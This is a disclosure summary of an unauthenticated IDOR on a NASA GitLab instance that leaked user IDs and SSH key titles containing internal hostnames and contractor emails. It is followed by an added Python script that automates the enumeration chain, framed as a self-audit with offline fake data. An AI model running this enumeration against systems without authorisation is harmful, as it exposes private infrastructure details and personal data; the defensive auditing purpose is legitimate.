Unauthenticated IDOR on Users API leading to Information Disclosure of Internal Hostnames and PII

Disclosed by ghaddarittoo
Summary by ghaddarittoo

An unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified in the API of NASA's restricted self-hosted GitLab instance at gitlab.smce.nasa.gov. The instance was configured as private, with the base users API endpoint correctly returning 403 Forbidden to unauthenticated requests.
However, a filter parameter bypass allowed unauthenticated users to enumerate any user account on the instance, retrieving internal user IDs and account metadata. By chaining the exposed user IDs with a separate unauthenticated API endpoint, an attacker could retrieve SSH key metadata for any enumerated user, including key titles containing sensitive information such as internal workstation hostnames, fully qualified domain names (FQDNs) pointing to NASA data center infrastructure, and contractor email addresses.
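
The two-step chain described above (an unauthenticated users-API query that slips past the 403, then a per-user SSH-keys lookup whose titles leak hostnames and e-mail addresses) can be turned into an audit for your own self-hosted instance. The script below is an added example, not code from the report, from the reporter, or from GitLab. It uses the public GitLab REST paths `/api/v4/users` and `/api/v4/users/:id/keys`; the candidate filter parameters it tries are documented users-API filters chosen as an assumption, not the parameter that produced the bypass in the report, which the summary does not name. The fake instance, its responses and the key titles are constructed so the script runs offline; the HTTP fetcher is injected so the same logic can be pointed at a real instance you are authorised to test.

```python
"""Audit helper: does a self-hosted GitLab instance answer unauthenticated
users-API queries and per-user SSH-key lookups?  Added example, not the
report's or GitLab's code.  Endpoint paths are the public GitLab REST API;
the filters probed are an assumption, and all sample data is constructed."""
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# Hypothetical candidates: documented GET /users filters.  The report does not
# say which filter bypassed the 403, so this list is an assumption, not a fact.
CANDIDATE_FILTERS = [{}, {"username": "root"}, {"search": "a"}, {"active": "true"}]

Fetcher = Callable[[str], Tuple[int, bytes]]


def http_fetch(url: str) -> Tuple[int, bytes]:
    """Unauthenticated GET (no PRIVATE-TOKEN header); returns (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "gitlab-users-audit"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def _json_list(body: bytes) -> List[dict]:
    try:
        data = json.loads(body)
    except ValueError:
        return []
    return data if isinstance(data, list) else []


def probe_users(base: str, fetch: Fetcher = http_fetch) -> Dict[str, List[dict]]:
    """Step 1: try each candidate filter against /api/v4/users with no credentials.
    Returns {query_string: [user objects]} for every request answered 200."""
    leaks: Dict[str, List[dict]] = {}
    for params in CANDIDATE_FILTERS:
        qs = urllib.parse.urlencode(params)
        url = f"{base}/api/v4/users" + (f"?{qs}" if qs else "")
        status, body = fetch(url)
        users = _json_list(body) if status == 200 else []
        if users:
            leaks[qs] = users
    return leaks


def fetch_keys(base: str, user_id: int, fetch: Fetcher = http_fetch) -> List[dict]:
    """Step 2: /api/v4/users/:id/keys for an enumerated ID, still unauthenticated."""
    status, body = fetch(f"{base}/api/v4/users/{user_id}/keys")
    return _json_list(body) if status == 200 else []


EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
FQDN_RE = re.compile(r"\b(?:[a-z0-9-]+\.){2,}[a-z]{2,}\b", re.I)


def sensitive_titles(keys: List[dict]) -> List[Tuple[str, str]]:
    """Flag key titles that carry an e-mail address or a multi-label FQDN.
    ssh-keygen's default comment is user@host, so titles often contain both."""
    findings = []
    for k in keys:
        title = str(k.get("title", ""))
        if EMAIL_RE.search(title):
            findings.append(("email", title))
        elif FQDN_RE.search(title):
            findings.append(("fqdn", title))
    return findings


def audit(base: str, fetch: Fetcher = http_fetch) -> dict:
    """Run the chain end to end: which filters leak, which users expose titles."""
    leaks = probe_users(base, fetch)
    exposed: Dict[int, List[Tuple[str, str]]] = {}
    for users in leaks.values():
        for u in users:
            uid = u.get("id")
            if uid is None or uid in exposed:
                continue
            hits = sensitive_titles(fetch_keys(base, uid, fetch))
            if hits:
                exposed[uid] = hits
    return {"leaking_filters": sorted(leaks), "exposed_users": exposed}


# Constructed fake instance: bare /users is 403 (the correct behaviour), one
# filtered query and the per-user keys endpoint answer 200.  Hypothetical host.
FAKE_BASE = "https://gitlab.example.test"
FAKE_RESPONSES = {
    "/api/v4/users": (403, b'{"message":"403 Forbidden"}'),
    "/api/v4/users?username=root": (200, b'[{"id":1,"username":"root","name":"Administrator"}]'),
    "/api/v4/users?search=a": (403, b'{"message":"403 Forbidden"}'),
    "/api/v4/users?active=true": (403, b'{"message":"403 Forbidden"}'),
    "/api/v4/users/1/keys": (200, b'[{"id":7,"title":"build-agent.dc1.example.internal"},'
                                  b'{"id":8,"title":"jdoe@contractor-example.com"},'
                                  b'{"id":9,"title":"laptop"}]'),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Offline stand-in for http_fetch that serves the constructed responses."""
    return FAKE_RESPONSES.get(url.split(FAKE_BASE, 1)[1], (404, b"{}"))


if __name__ == "__main__":
    print(json.dumps(audit(FAKE_BASE, fake_fetch), indent=2))
```

Against a live instance, call `audit("https://gitlab.your.org")` with the default fetcher; an empty `leaking_filters` list means every candidate query was refused, and any entry in `exposed_users` is a key title worth renaming even after the API is locked down, since titles outlive the misconfiguration.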

Activity